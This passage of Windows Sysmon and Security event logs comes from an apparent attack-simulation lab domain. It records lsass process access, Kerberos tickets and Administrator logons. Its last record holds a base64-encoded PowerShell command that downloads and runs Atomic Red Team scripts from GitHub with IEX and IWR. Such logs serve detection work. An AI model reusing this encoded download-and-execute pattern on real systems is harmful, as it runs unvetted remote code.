{A837DB8D-01B5-5F25-0000-0010FACE0000}\r\nTargetProcessId: 1332\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1a4e6|C:\\Windows\\system32\\lsasrv.dll+1ba8f|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:19.311","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-001001540000}","SourceProcessId":"864","SourceThreadId":"2800","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{A837DB8D-01B5-5F25-0000-0010FACE0000}","TargetProcessId":"1332","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1a4e6|C:\\Windows\\system32\\lsasrv.dll+1ba8f|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:19","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:19","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4590,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:19.311\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-001001540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 2800\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {A837DB8D-01B5-5F25-0000-0010FACE0000}\r\nTargetProcessId: 1332\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1e0a8|C:\\Windows\\system32\\lsasrv.dll+1d2d1|C:\\Windows\\system32\\lsasrv.dll+1bb00|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:19.311","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-001001540000}","SourceProcessId":"864","SourceThreadId":"2800","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{A837DB8D-01B5-5F25-0000-0010FACE0000}","TargetProcessId":"1332","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1e0a8|C:\\Windows\\system32\\lsasrv.dll+1d2d1|C:\\Windows\\system32\\lsasrv.dll+1bb00|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:19","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:19","Hostname":"win-dc-881393.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4768,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":14339,"OpcodeValue":0,"RecordNumber":220525,"ProcessID":864,"ThreadID":2800,"Channel":"Security","Message":"A Kerberos authentication ticket (TGT) was requested.\r\n\r\nAccount Information:\r\n\tAccount Name:\t\tAdministrator\r\n\tSupplied Realm Name:\tATTACKRANGE\r\n\tUser ID:\t\t\tS-1-5-21-1117747729-287425051-3091891954-500\r\n\r\nService Information:\r\n\tService Name:\t\tkrbtgt\r\n\tService ID:\t\tS-1-5-21-1117747729-287425051-3091891954-502\r\n\r\nNetwork Information:\r\n\tClient Address:\t\t::1\r\n\tClient Port:\t\t0\r\n\r\nAdditional Information:\r\n\tTicket Options:\t\t0x40810010\r\n\tResult Code:\t\t0x0\r\n\tTicket Encryption Type:\t0x12\r\n\tPre-Authentication Type:\t2\r\n\r\nCertificate Information:\r\n\tCertificate Issuer Name:\t\t\r\n\tCertificate Serial Number:\t\r\n\tCertificate Thumbprint:\t\t\r\n\r\nCertificate information is only provided if a certificate was used for pre-authentication.\r\n\r\nPre-authentication types, ticket options, encryption types and result codes are defined in RFC 4120.","Category":"Kerberos Authentication Service","Opcode":"Info","TargetUserName":"Administrator","TargetDomainName":"ATTACKRANGE","TargetSid":"S-1-5-21-1117747729-287425051-3091891954-500","ServiceName":"krbtgt","ServiceSid":"S-1-5-21-1117747729-287425051-3091891954-502","TicketOptions":"0x40810010","Status":"0x0","TicketEncryptionType":"0x12","PreAuthType":"2","IpAddress":"::1","IpPort":"0","EventReceivedTime":"2020-08-01 05:52:20","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:19","Hostname":"win-dc-881393.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4769,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":14337,"OpcodeValue":0,"RecordNumber":220526,"ProcessID":864,"ThreadID":2800,"Channel":"Security","Message":"A Kerberos service ticket was requested.\r\n\r\nAccount Information:\r\n\tAccount Name:\t\tAdministrator@ATTACKRANGE.LOCAL\r\n\tAccount Domain:\t\tATTACKRANGE.LOCAL\r\n\tLogon GUID:\t\t{6E87E276-6B34-7587-1335-C73AE57D1ECA}\r\n\r\nService Information:\r\n\tService Name:\t\tWIN-DC-881393$\r\n\tService ID:\t\tS-1-5-21-1117747729-287425051-3091891954-1008\r\n\r\nNetwork Information:\r\n\tClient Address:\t\t::1\r\n\tClient Port:\t\t0\r\n\r\nAdditional Information:\r\n\tTicket Options:\t\t0x40810000\r\n\tTicket Encryption Type:\t0x12\r\n\tFailure Code:\t\t0x0\r\n\tTransited Services:\t-\r\n\r\nThis event is generated every time access is requested to a resource such as a computer or a Windows service.  The service name indicates the resource to which access was requested.\r\n\r\nThis event can be correlated with Windows logon events by comparing the Logon GUID fields in each event.  The logon event occurs on the machine that was accessed, which is often a different machine than the domain controller which issued the service ticket.\r\n\r\nTicket options, encryption types, and failure codes are defined in RFC 4120.","Category":"Kerberos Service Ticket Operations","Opcode":"Info","TargetUserName":"Administrator@ATTACKRANGE.LOCAL","TargetDomainName":"ATTACKRANGE.LOCAL","ServiceName":"WIN-DC-881393$","ServiceSid":"S-1-5-21-1117747729-287425051-3091891954-1008","TicketOptions":"0x40810000","TicketEncryptionType":"0x12","IpAddress":"::1","IpPort":"0","Status":"0x0","LogonGuid":"{6E87E276-6B34-7587-1335-C73AE57D1ECA}","TransmittedServices":"-","EventReceivedTime":"2020-08-01 05:52:20","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:19","Hostname":"win-dc-881393.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4648,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12544,"OpcodeValue":0,"RecordNumber":220527,"ActivityID":"{16791790-67C7-0001-9217-7916C767D601}","ProcessID":864,"ThreadID":2800,"Channel":"Security","Message":"A logon was attempted using explicit credentials.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-20\r\n\tAccount Name:\t\tWIN-DC-881393$\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x3E4\r\n\tLogon GUID:\t\t{00000000-0000-0000-0000-000000000000}\r\n\r\nAccount Whose Credentials Were Used:\r\n\tAccount Name:\t\tAdministrator\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon GUID:\t\t{6E87E276-6B34-7587-1335-C73AE57D1ECA}\r\n\r\nTarget Server:\r\n\tTarget Server Name:\tlocalhost\r\n\tAdditional Information:\tlocalhost\r\n\r\nProcess Information:\r\n\tProcess ID:\t\t0x534\r\n\tProcess Name:\t\tC:\\Windows\\System32\\svchost.exe\r\n\r\nNetwork Information:\r\n\tNetwork Address:\t-\r\n\tPort:\t\t\t-\r\n\r\nThis event is generated when a process attempts to log on an account by explicitly specifying that account’s credentials.  This most commonly occurs in batch-type configurations such as scheduled tasks, or when using the RUNAS command.","Category":"Logon","Opcode":"Info","SubjectUserSid":"S-1-5-20","SubjectUserName":"WIN-DC-881393$","SubjectDomainName":"ATTACKRANGE","SubjectLogonId":"0x3e4","LogonGuid":"{00000000-0000-0000-0000-000000000000}","TargetUserName":"Administrator","TargetDomainName":"ATTACKRANGE","TargetLogonGuid":"{6E87E276-6B34-7587-1335-C73AE57D1ECA}","TargetServerName":"localhost","TargetInfo":"localhost","ProcessName":"C:\\Windows\\System32\\svchost.exe","IpAddress":"-","IpPort":"-","EventReceivedTime":"2020-08-01 05:52:20","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:19","Hostname":"win-dc-881393.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4624,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":2,"Task":12544,"OpcodeValue":0,"RecordNumber":220528,"ActivityID":"{16791790-67C7-0001-9217-7916C767D601}","ProcessID":864,"ThreadID":2800,"Channel":"Security","Message":"An account was successfully logged on.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-20\r\n\tAccount Name:\t\tWIN-DC-881393$\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x3E4\r\n\r\nLogon Information:\r\n\tLogon Type:\t\t3\r\n\tRestricted Admin Mode:\t-\r\n\tVirtual Account:\t\tNo\r\n\tElevated Token:\t\tYes\r\n\r\nImpersonation Level:\t\tImpersonation\r\n\r\nNew Logon:\r\n\tSecurity ID:\t\tS-1-5-21-1117747729-287425051-3091891954-500\r\n\tAccount Name:\t\tAdministrator\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x6DADF\r\n\tLinked Logon ID:\t\t0x0\r\n\tNetwork Account Name:\t-\r\n\tNetwork Account Domain:\t-\r\n\tLogon GUID:\t\t{6E87E276-6B34-7587-1335-C73AE57D1ECA}\r\n\r\nProcess Information:\r\n\tProcess ID:\t\t0x534\r\n\tProcess Name:\t\tC:\\Windows\\System32\\svchost.exe\r\n\r\nNetwork Information:\r\n\tWorkstation Name:\tWIN-DC-881393\r\n\tSource Network Address:\t-\r\n\tSource Port:\t\t-\r\n\r\nDetailed Authentication Information:\r\n\tLogon Process:\t\tAdvapi  \r\n\tAuthentication Package:\tNegotiate\r\n\tTransited Services:\t-\r\n\tPackage Name (NTLM only):\t-\r\n\tKey Length:\t\t0\r\n\r\nThis event is generated when a logon session is created. It is generated on the computer that was accessed.\r\n\r\nThe subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.\r\n\r\nThe logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).\r\n\r\nThe New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.\r\n\r\nThe network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.\r\n\r\nThe impersonation level field indicates the extent to which a process in the logon session can impersonate.\r\n\r\nThe authentication information fields provide detailed information about this specific logon request.\r\n\t- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.\r\n\t- Transited services indicate which intermediate services have participated in this logon request.\r\n\t- Package name indicates which sub-protocol was used among the NTLM protocols.\r\n\t- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.","Category":"Logon","Opcode":"Info","SubjectUserSid":"S-1-5-20","SubjectUserName":"WIN-DC-881393$","SubjectDomainName":"ATTACKRANGE","SubjectLogonId":"0x3e4","TargetUserSid":"S-1-5-21-1117747729-287425051-3091891954-500","TargetUserName":"Administrator","TargetDomainName":"ATTACKRANGE","TargetLogonId":"0x6dadf","LogonType":"3","LogonProcessName":"Advapi  ","AuthenticationPackageName":"Negotiate","WorkstationName":"WIN-DC-881393","LogonGuid":"{6E87E276-6B34-7587-1335-C73AE57D1ECA}","TransmittedServices":"-","LmPackageName":"-","KeyLength":"0","ProcessName":"C:\\Windows\\System32\\svchost.exe","IpAddress":"-","IpPort":"-","ImpersonationLevel":"%%1833","RestrictedAdminMode":"-","TargetOutboundUserName":"-","TargetOutboundDomainName":"-","VirtualAccount":"%%1843","TargetLinkedLogonId":"0x0","ElevatedToken":"%%1842","EventReceivedTime":"2020-08-01 05:52:20","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:19","Hostname":"win-dc-881393.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4672,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12548,"OpcodeValue":0,"RecordNumber":220529,"ActivityID":"{16791790-67C7-0001-9217-7916C767D601}","ProcessID":864,"ThreadID":2800,"Channel":"Security","Message":"Special privileges assigned to new logon.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-21-1117747729-287425051-3091891954-500\r\n\tAccount Name:\t\tAdministrator\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x6DADF\r\n\r\nPrivileges:\t\tSeSecurityPrivilege\r\n\t\t\tSeTakeOwnershipPrivilege\r\n\t\t\tSeLoadDriverPrivilege\r\n\t\t\tSeBackupPrivilege\r\n\t\t\tSeRestorePrivilege\r\n\t\t\tSeDebugPrivilege\r\n\t\t\tSeSystemEnvironmentPrivilege\r\n\t\t\tSeEnableDelegationPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeDelegateSessionUserImpersonatePrivilege","Category":"Special Logon","Opcode":"Info","SubjectUserSid":"S-1-5-21-1117747729-287425051-3091891954-500","SubjectUserName":"Administrator","SubjectDomainName":"ATTACKRANGE","SubjectLogonId":"0x6dadf","PrivilegeList":"SeSecurityPrivilege\r\n\t\t\tSeTakeOwnershipPrivilege\r\n\t\t\tSeLoadDriverPrivilege\r\n\t\t\tSeBackupPrivilege\r\n\t\t\tSeRestorePrivilege\r\n\t\t\tSeDebugPrivilege\r\n\t\t\tSeSystemEnvironmentPrivilege\r\n\t\t\tSeEnableDelegationPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeDelegateSessionUserImpersonatePrivilege","EventReceivedTime":"2020-08-01 05:52:20","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:19","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":4591,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:19.527\r\nProcessGuid: {A837DB8D-0313-5F25-0000-001016DC0600}\r\nProcessId: 3852\r\nImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nFileVersion: 10.0.14393.206 (rs1_release.160915-0644)\r\nDescription: Windows PowerShell\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: PowerShell.EXE\r\nCommandLine: \"powershell.exe\" -noninteractive -encodedcommand WwBDAG8AbgBzAG8AbABlAF0AOgA6AEkAbgBwAHUAdABFAG4AYwBvAGQAaQBuAGcAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFQAZQB4AHQALgBVAFQARgA4AEUAbgBjAG8AZABpAG4AZwAgACQAZgBhAGwAcwBlADsAIABTAGUAdAAtAEkAdABlAG0AUAByAG8AcABlAHIAdAB5ACAALQBQAGEAdABoACAAIgBIAEsATABNADoAXABTAE8ARgBUAFcAQQBSAEUAXABNAGkAYwByAG8AcwBvAGYAdABcAEkAbgB0AGUAcgBuAGUAdAAgAEUAeABwAGwAbwByAGUAcgBcAE0AYQBpAG4AIgAgAC0ATgBhAG0AZQAgACIARABpAHMAYQBiAGwAZQBGAGkAcgBzAHQAUgB1AG4AQwB1AHMAdABvAG0AaQB6AGUAIgAgAC0AVgBhAGwAdQBlACAAMgAKAEkARQBYACAAKABJAFcAUgAgAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcgBlAGQAYwBhAG4AYQByAHkAYwBvAC8AaQBuAHYAbwBrAGUALQBhAHQAbwBtAGkAYwByAGUAZAB0AGUAYQBtAC8AbQBhAHMAdABlAHIALwBpAG4AcwB0AGEAbABsAC0AYQB0AG8AbQBpAGMAcgBlAGQAdABlAGEAbQAuAHAAcwAxACkACgBJAG4AcwB0AGEAbABsAC0AQQB0AG8AbQBpAGMAUgBlAGQAVABlAGEAbQAgAC0ARgBvAHIAYwBlAAoASQBFAFgAIAAoAEkAVwBSACAAJwBoAHQAdABwAHMAOgAvAC8AcgBhAHcALgBnAGkAdABoAHUAYgB1AHMAZQByAGMAbwBuAHQAZQBuAHQALgBjAG8AbQAvAHIAZQBkAGMAYQBuAGEAcgB5AGMAbwAvAGkAbgB2AG8AawBlAC0AYQB0AG8AbQBpAGMAcgBlAGQAdABlAGEAbQAvAG0AYQBzAHQAZQByAC8AaQBuAHMAdABhAGwAbAAtAGEAdABvAG0AaQBjAHMAZgBvAGwAZABlAHIALgBwAHMAMQAnACAALQBVAHMAZQBCAGEAcwBpAGMAUABhAHIAcwBpAG4AZwApAAoASQBuAHMAdABhAGwAbAAtAEEAdABvAG0AaQBjAHMARgBvAGwAZABlAHIAIAAtAEYAbwByAGMAZQAgAC0AUgBlAHAAbwBPAHcAbgBlAHIAIAAiAHMAcABsAHUAbgBrACIAIAAtAEIAcgBhAG4AYwBoACAAIgBsAG8AYwBhAGwALQBtAGEAcwB0AGUAcgAiAA==\r\nCurrentDirectory: C:\\Users\\Administrator\\\r\nUser: ATTACKRANGE\\Administrator\r\nLogonGuid: {A837DB8D-0312-5F25-0000-0020C4B40600}\r\nLogonId: 0x6B4C4\r\nTerminalSessionId: 0\r\nIntegrityLevel: High\r\nHashes: MD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453\r\nParentProcessGuid: {A837DB8D-0312-5F25-0000-001064C40600}\r\nParentProcessId: 4920\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand JgBjAGgAYwBwAC4AYwBvAG0AIAA2ADUAMAAwADEAIAA+ACAAJABuAHUAbABsAAoAJABlAHgAZQBjAF8AdwByAGEAcABwAGUAcgBfAHMAdAByACAAPQAgACQAaQBuAHAAdQB0ACAAfAAgAE8AdQB0AC0AUwB0AHIAaQBuAGcACgAkAHMAcABsAGkAdABfAHAAYQByAHQAcwAgAD0AIAAkAGUAeABlAGMAXwB3AHIAYQBwAHAAZQByAF8AcwB0AHIALgBTAHAAbABpAHQAKABAACgAIgBgADAAYAAwAGAAMABgADAAIgApACwAIAAyACwAIABbAFMAdAByAGkAbgBnAFMAcABsAGkAdABPAHAAdABpAG8AbgBzAF0AOgA6AFIAZQBtAG8AdgBlAEUAbQBwAHQAeQBFAG4AdAByAGkAZQBzACkACgBJAGYAIAAoAC0AbgBvAHQAIAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwAuAEwAZQBuAGcAdABoACAALQBlAHEAIAAyACkAIAB7ACAAdABoAHIAbwB3ACAAIgBpAG4AdgBhAGwAaQBkACAAcABhAHkAbABvAGEAZAAiACAAfQAKAFMAZQB0AC0AVgBhAHIAaQBhAGIAbABlACAALQBOAGEAbQBlACAAagBzAG8AbgBfAHIAYQB3ACAALQBWAGEAbAB1AGUAIAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwBbADEAXQAKACQAZQB4AGUAYwBfAHcAcgBhAHAAcABlAHIAIAA9ACAAWwBTAGMAcgBpAHAAdABCAGwAbwBjAGsAXQA6ADoAQwByAGUAYQB0AGUAKAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwBbADAAXQApAAoAJgAkAGUAeABlAGMAXwB3AHIAYQBwAHAAZQByAA==","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 05:52:19.527","ProcessGuid":"{A837DB8D-0313-5F25-0000-001016DC0600}","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","FileVersion":"10.0.14393.206 (rs1_release.160915-0644)","Description":"Windows PowerShell","Product":"Microsoft® Windows® Operating System","Company":"Microsoft Corporation","OriginalFileName":"PowerShell.EXE","CommandLine":"\"powershell.exe\" -noninteractive -encodedcommand WwBDAG8AbgBzAG8AbABlAF0AOgA6AEkAbgBwAHUAdABFAG4AYwBvAGQAaQBuAGcAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFQAZQB4AHQALgBVAFQARgA4AEUAbgBjAG8AZABpAG4AZwAgACQAZgBhAGwAcwBlADsAIABTAGUAdAAtAEkAdABlAG0AUAByAG8AcABlAHIAdAB5ACAALQBQAGEAdABoACAAIgBIAEsATABNADoAXABTAE8ARgBUAFcAQQBSAEUAXABNAGkAYwByAG8AcwBvAGYAdABcAEkAbgB0AGUAcgBuAGUAdAAgAEUAeABwAGwAbwByAGUAcgBcAE0AYQBpAG4AIgAgAC0ATgBhAG0AZQAgACIARABpAHMAYQBiAGwAZQBGAGkAcgBzAHQAUgB1AG4AQwB1AHMAdABvAG0AaQB6AGUAIgAgAC0AVgBhAGwAdQBlACAAMgAKAEkARQBYACAAKABJAFcAUgAgAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcgBlAGQAYwBhAG4AYQByAHkAYwBvAC8AaQBuAHYAbwBrAGUALQBhAHQAbwBtAGkAYwByAGUAZAB0AGUAYQBtAC8AbQBhAHMAdABlAHIALwBpAG4AcwB0AGEAbABsAC0AYQB0AG8AbQBpAGMAcgBlAGQAdABlAGEAbQAuAHAAcwAxACkACgBJAG4AcwB0AGEAbABsAC0AQQB0AG8AbQBpAGMAUgBlAGQAVABlAGEAbQAgAC0ARgBvAHIAYwBlAAoASQBFAFgAIAAoAEkAVwBSACAAJwBoAHQAdABwAHMAOgAvAC8AcgBhAHcALgBnAGkAdABoAHUAYgB1AHMAZQByAGMAbwBuAHQAZQBuAHQALgBjAG8AbQAvAHIAZQBkAGMAYQBuAGEAcgB5AGMAbwAvAGkAbgB2AG8AawBlAC0AYQB0AG8AbQBpAGMAcgBlAGQAdABlAGEAbQAvAG0AYQBzAHQAZQByAC8AaQBuAHMAdABhAGwAbAAtAGEAdABvAG0AaQBjAHMAZgBvAGwAZABlAHIALgBwAHMAMQAnACAALQBVAHMAZQBCAGEAcwBpAGMAUABhAHIAcwBpAG4AZwApAAoASQBuAHMAdABhAGwAbAAtAEEAdABvAG0AaQBjAHMARgBvAGwAZABlAHIAIAAtAEYAbwByAGMAZQAgAC0AUgBlAHAAbwBPAHcAbgBlAHIAIAAiAHMAcABsAHUAbgBrACIAIAAtAEIAcgBhAG4AYwBoACAAIgBsAG8AYwBhAGwALQBtAGEAcwB0AGUAcgAiAA==","CurrentDirectory":"C:\\Users\\Administrator\\","User":"ATTACKRANGE\\Administrator","LogonGuid":"{A837DB8D-0312-5F25-0000-0020C4B40600}","LogonId":"0x6b4c4","TerminalSessionId":"0","IntegrityLevel":"High","Hashes":"MD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453","ParentProcessGuid":"{A837DB8D-0312-5F25-0000-001064C40600}","ParentProcessId":"4920","ParentImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","ParentCommandLine":"\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand 